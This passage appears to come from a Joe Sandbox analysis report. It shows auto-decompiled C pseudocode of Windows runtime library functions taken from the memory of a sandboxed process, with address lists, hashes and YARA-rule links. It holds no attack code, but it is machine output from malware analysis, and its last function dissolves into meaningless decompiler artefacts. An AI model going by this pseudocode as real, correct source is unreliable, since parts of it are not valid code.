				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0352CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03507D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E035B8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0352AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x35d8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x35d862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x35d8628; // 0x0
							_t116 =  *0x35d862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                  0x0350b94c
                                  0x0350b956
                                  0x0350b95c
                                  0x0350b95e
                                  0x0350b964
                                  0x0350b969
                                  0x0350b96d
                                  0x0350b96d
                                  0x0350b970
                                  0x0350b974
                                  0x0350b97a
                                  0x0350badf
                                  0x0350badf
                                  0x0350bae2
                                  0x0350bae4
                                  0x0350bae6
                                  0x0350baf0
                                  0x03552cb8
                                  0x0350baf6
                                  0x0350baf6
                                  0x0350baf6
                                  0x0350bafd
                                  0x0350bb1f
                                  0x0350bb1f
                                  0x0350baff
                                  0x0350bb00
                                  0x0350bb00
                                  0x0350bb03
                                  0x0350bb03
                                  0x0350bacb
                                  0x0350bacf
                                  0x0350bad0
                                  0x0350bad1
                                  0x0350badc
                                  0x0350badc
                                  0x0350b980
                                  0x0350b980
                                  0x0350b988
                                  0x0350b98b
                                  0x0350b98d
                                  0x0350b990
                                  0x0350b993
                                  0x0350b999
                                  0x0350b99b
                                  0x0350b9a1
                                  0x0350b9a5
                                  0x0350b9aa
                                  0x0350b9b0
                                  0x0350b9bb
                                  0x0350b9c0
                                  0x0350b9c3
                                  0x0350b9ca
                                  0x0350b9cc
                                  0x0350b9cf
                                  0x0350b9d3
                                  0x0350b9d7
                                  0x0350ba94
                                  0x0350ba94
                                  0x0350ba98
                                  0x0350baa3
                                  0x03552ccb
                                  0x0350baa9
                                  0x0350baa9
                                  0x0350baa9
                                  0x0350bab1
                                  0x03552cd5
                                  0x03552cdd
                                  0x03552cdd
                                  0x0350babb
                                  0x0350babc
                                  0x0350bac2
                                  0x0350bac3
                                  0x0350bac3
                                  0x0350bac6
                                  0x00000000
                                  0x0350b9dd
                                  0x0350b9dd
                                  0x0350b9e7
                                  0x0350b9e7
                                  0x0350b9ec
                                  0x0350b9ec
                                  0x0350b9f1
                                  0x0350b9f5
                                  0x0350b9fa
                                  0x0350ba00
                                  0x0350ba0c
                                  0x0350ba10
                                  0x0350ba10
                                  0x0350ba12
                                  0x0350ba18
                                  0x00000000
                                  0x00000000
                                  0x0350bb26
                                  0x0350bb26
                                  0x0350ba1e
                                  0x0350ba1e
                                  0x0350ba23
                                  0x0350ba25
                                  0x0350ba2c
                                  0x0350ba30
                                  0x0350ba35
                                  0x0350ba35
                                  0x0350ba41
                                  0x0350ba46
                                  0x0350ba4c
                                  0x0350ba50
                                  0x0350ba54
                                  0x0350ba6a
                                  0x0350ba6e
                                  0x0350ba70
                                  0x0350ba74
                                  0x0350ba78
                                  0x0350ba7a
                                  0x0350ba7c
                                  0x0350ba8e
                                  0x0350ba90
                                  0x0350ba92
                                  0x0350bb14
                                  0x0350bb14
                                  0x0350bb16
                                  0x0350bb16
                                  0x00000000
                                  0x0350ba7c
                                  0x0350bb0a
                                  0x0350bb0d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0350bb0f

                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0350B9A5
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID:
                                  • API String ID: 885266447-0
                                  • Opcode ID: 72588aabb415fb8ec5f1b8341731b36ed73a290b1450c17c5327e75d58be1e60
                                  • Instruction ID: e7a4027bc5ca30df4119fecf99ceb7ca8641a7bc7d4852b9edc67dd6a9fcb2f7
                                  • Opcode Fuzzy Hash: 72588aabb415fb8ec5f1b8341731b36ed73a290b1450c17c5327e75d58be1e60
                                  • Instruction Fuzzy Hash: 1A513A71608341DFC720DF29D0C092ABBF9FB88610F584D6EE995973A4D732E844CB92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 034EB171 Relevance: 1.7, APIs: 1, Instructions: 166COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E034EB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x35bf7a8);
				E0353D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0353D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0352D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0352F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0353DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0352B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0352B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0352E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0352A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                  0x034eb171
                                  0x034eb171
                                  0x034eb171
                                  0x034eb171
                                  0x034eb171
                                  0x034eb176
                                  0x034eb17b
                                  0x034eb180
                                  0x034eb186
                                  0x034eb18f
                                  0x034eb198
                                  0x034eb1a4
                                  0x034eb1aa
                                  0x03544802
                                  0x03544802
                                  0x03544805
                                  0x0354480c
                                  0x0354480e
                                  0x034eb1d1
                                  0x034eb1d3
                                  0x034eb1de
                                  0x034eb1de
                                  0x03544817
                                  0x0354481e
                                  0x03544820
                                  0x03544822
                                  0x03544822
                                  0x03544824
                                  0x03544824
                                  0x0354482a
                                  0x00000000
                                  0x00000000
                                  0x03544835
                                  0x0354483a
                                  0x0354483d
                                  0x0354483f
                                  0x03544842
                                  0x03544842
                                  0x03544842
                                  0x03544846
                                  0x0354484c
                                  0x0354484e
                                  0x03544851
                                  0x03544851
                                  0x03544853
                                  0x03544854
                                  0x03544854
                                  0x03544858
                                  0x0354485a
                                  0x0354485a
                                  0x0354485d
                                  0x0354485f
                                  0x03544861
                                  0x03544861
                                  0x03544866
                                  0x0354486b
                                  0x0354486e
                                  0x03544871
                                  0x03544876
                                  0x03544876
                                  0x03544878
                                  0x0354487b
                                  0x03544884
                                  0x03544884
                                  0x00000000
                                  0x0354487d
                                  0x0354487d
                                  0x03544882
                                  0x03544889
                                  0x03544889
                                  0x0354488f
                                  0x03544891
                                  0x035448e0
                                  0x035448e2
                                  0x035448e4
                                  0x035448e4
                                  0x035448e7
                                  0x035448e7
                                  0x035448ed
                                  0x035448f4
                                  0x035448f6
                                  0x03544951
                                  0x03544951
                                  0x03544953
                                  0x03544953
                                  0x03544956
                                  0x03544956
                                  0x03544958
                                  0x03544959
                                  0x03544959
                                  0x0354495d
                                  0x0354495d
                                  0x0354495f
                                  0x0354495f
                                  0x03544965
                                  0x03544969
                                  0x035449ba
                                  0x035449ba
                                  0x035449c1
                                  0x035449c5
                                  0x035449cc
                                  0x035449d4
                                  0x035449d7
                                  0x035449da
                                  0x035449e4
                                  0x035449e5
                                  0x035449f3
                                  0x03544a02
                                  0x00000000
                                  0x03544a02
                                  0x03544972
                                  0x03544974
                                  0x00000000
                                  0x00000000
                                  0x03544976
                                  0x03544979
                                  0x03544982
                                  0x03544983
                                  0x03544984
                                  0x0354498b
                                  0x0354498d
                                  0x03544991
                                  0x03544993
                                  0x03544999
                                  0x0354499d
                                  0x035449a2
                                  0x035449a2
                                  0x035449a2
                                  0x03544999
                                  0x035449ac
                                  0x00000000
                                  0x035449b3
                                  0x035448f8
                                  0x035448fe
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035448fe
                                  0x03544895
                                  0x0354489c
                                  0x035448ad
                                  0x035448b2
                                  0x035448b5
                                  0x035448b7
                                  0x035448ba
                                  0x035448bc
                                  0x035448c6
                                  0x035448c6
                                  0x035448cb
                                  0x035448d1
                                  0x035448d4
                                  0x035448d8
                                  0x035448d8
                                  0x00000000
                                  0x035448d8
                                  0x035448be
                                  0x035448c0
                                  0x00000000
                                  0x00000000
                                  0x035448c2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035448c4
                                  0x00000000
                                  0x03544882
                                  0x0354487b
                                  0x03544904
                                  0x03544906
                                  0x00000000
                                  0x00000000
                                  0x03544908
                                  0x0354490e
                                  0x00000000
                                  0x00000000
                                  0x03544910
                                  0x03544917
                                  0x03544917
                                  0x00000000
                                  0x03544917
                                  0x034eb1ba
                                  0x035447f9
                                  0x035447fc
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x035447fc
                                  0x034eb1c0
                                  0x034eb1c0
                                  0x034eb1c3
                                  0x034eb1cb
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000013.00000002.981500601.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: true
                                  • Associated: 00000013.00000002.981748738.00000000035DB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  • Associated: 00000013.00000002.981764982.00000000035DF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_19_2_34c0000_wlanext.jbxd
                                  Similarity
                                  • API ID: _vswprintf_s
                                  • String ID:
                                  • API String ID: 677850445-0
                                  • Opcode ID: 7ebd2c40d801950e1d62974fcea630eb235897f80e066c8505c6686d5c1a60e4
                                  • Instruction ID: c14e66203d284ac0f7a16fdc0240fc16f58da0a305c384e0c1a113cad3f406cb
                                  • Opcode Fuzzy Hash: 7ebd2c40d801950e1d62974fcea630eb235897f80e066c8505c6686d5c1a60e4
                                  • Instruction Fuzzy Hash: BE5113B5D042A98FDF38CF65D845BBEBBB0BF01718F1441ADD859AB2A1D73089419B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 03512581 Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E03512581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1530200909, char _a1546912589) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t237;
				signed int _t241;
				void* _t243;
				char* _t244;
				signed int _t247;
				signed int _t249;
				intOrPtr _t251;
				signed int _t254;
				signed int _t261;
				signed int _t264;
				signed int _t272;
				intOrPtr _t278;
				signed int _t280;
				signed int _t282;
				void* _t286;
				signed int _t287;
				unsigned int _t290;
				signed int _t294;
				void* _t295;
				signed int _t297;
				signed int _t301;
				intOrPtr* _t312;
				intOrPtr _t314;
				signed int _t323;
				signed int _t325;
				signed int _t326;
				signed int _t330;
				signed int _t331;
				void* _t335;
				signed int _t336;
				signed int _t338;
				void* _t340;
				void* _t341;
				signed int _t342;
				void* _t343;
				void* _t346;

				_t338 = _t342;
				_t343 = _t342 - 0x4c;
				_v8 =  *0x35dd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t330 = 0x35db2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t290 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t278 = 0x48;
				_t311 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t323 = 0;
				_v37 = _t311;
				if(_v48 <= 0) {
					L16:
					_t45 = _t278 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t331 = 0xc0000106;
						goto L32;
					} else {
						_t330 = L03504620(_t290,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t330;
						__eflags = _t330;
						if(_t330 == 0) {
							_t331 = 0xc0000017;
							goto L32;
						} else {
							 *(_t330 + 0x44) =  *(_t330 + 0x44) & 0x00000000;
							_t50 = _t330 + 0x48; // 0x48
							_t325 = _t50;
							_t311 = _v32;
							 *((intOrPtr*)(_t330 + 0x3c)) = _t278;
							_t280 = 0;
							 *((short*)(_t330 + 0x30)) = _v48;
							__eflags = _t311;
							if(_t311 != 0) {
								 *(_t330 + 0x18) = _t325;
								__eflags = _t311 - 0x35d8478;
								 *_t330 = ((0 | _t311 == 0x035d8478) - 0x00000001 & 0xfffffffb) + 7;
								E0352F3E0(_t325,  *((intOrPtr*)(_t311 + 4)),  *_t311 & 0x0000ffff);
								_t311 = _v32;
								_t343 = _t343 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t325 = _t325 + (( *_t311 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E035739F2(_t325);
									_t311 = _v32;
									_t325 = _t272;
								}
							}
							_t294 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t331 = _v68;
								__eflags = 0;
								 *((short*)(_t325 - 2)) = 0;
								goto L32;
							} else {
								_t282 = _t330 + _t280 * 4;
								_v56 = _t282;
								do {
									__eflags = _t311;
									if(_t311 != 0) {
										_t237 =  *(_v60 + _t294 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t282 =  *(_v60 + _t294 * 4);
										 *(_t282 + 0x18) = _t325;
										_t241 =  *(_v60 + _t294 * 4);
										__eflags = _t241 - 8;
										if(_t241 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M03512959))) {
												case 0:
													__ax =  *0x35d8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0352F3E0(__edi,  *0x35d848c, __ax & 0x0000ffff);
														__eax =  *0x35d8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0352F3E0(_t325, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x35d8480 & 0x0000ffff = E0352F3E0(__edi,  *0x35d8484,  *0x35d8480 & 0x0000ffff);
													__eax =  *0x35d8480 & 0x0000ffff;
													__eax = ( *0x35d8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0352F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0352F3E0(_t325, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t343 = _t343 + 0xc;
													_t325 = _t325 + (_t267 >> 1) * 2 + 2;
													__eflags = _t325;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t325 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x35d575c;
													__eflags = __ebx - 0x35d575c;
													if(__ebx != 0x35d575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0352F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x35d575c;
														} while (__ebx != 0x35d575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x35d8478 & 0x0000ffff = E0352F3E0(__edi,  *0x35d847c,  *0x35d8478 & 0x0000ffff);
													__eax =  *0x35d8478 & 0x0000ffff;
													__eax = ( *0x35d8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E035739F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x35d6e58 & 0x0000ffff = E0352F3E0(__edi,  *0x35d6e5c,  *0x35d6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x35d6e58 & 0x0000ffff;
													__eax = ( *0x35d6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t294 = _v16;
													_t311 = _v32;
													L29:
													_t282 = _t282 + 4;
													__eflags = _t282;
													_v56 = _t282;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t294 = _t294 + 1;
									_v16 = _t294;
									__eflags = _t294 - _v48;
								} while (_t294 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t323 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M03512935))) {
							case 0:
								__ax =  *0x35d8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t311 =  &_v64;
								_v80 = E03512E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x35d8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x35d8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E034FEEF0(0x35d79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E034FEB70(__ecx, 0x35d79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t331;
												if(_t331 < 0) {
													L035077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t290 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x35d7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L03504620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E034FEB70(__ecx, 0x35d79a0);
										__eax = _v52;
										L36:
										_pop(_t324);
										_pop(_t332);
										__eflags = _v8 ^ _t338;
										_pop(_t279);
										return E0352B640(_t216, _t279, _v8 ^ _t338, _t311, _t324, _t332);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t311 =  &_v36;
									_t276 = E03512E3E(_t274,  &_v36);
									_t290 = _v36;
									_v76 = _t276;
								}
								if(_t290 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t290;
								}
								goto L14;
							case 6:
								__eax =  *0x35d5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x35d8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x35d8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x35d6e58 & 0x0000ffff;
								__eax = ( *0x35d6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t323 = _t323 + 1;
								if(_t323 >= _v48) {
									goto L16;
								} else {
									_t311 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t295 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					_push(_t295);
					_push(_t295);
					_t346 = _t343 +  *((intOrPtr*)(_t330 + 0x28)) + _t241;
					asm("daa");
					_push(_t295);
					_t340 = _t338 +  *_t330;
					_push(_t295);
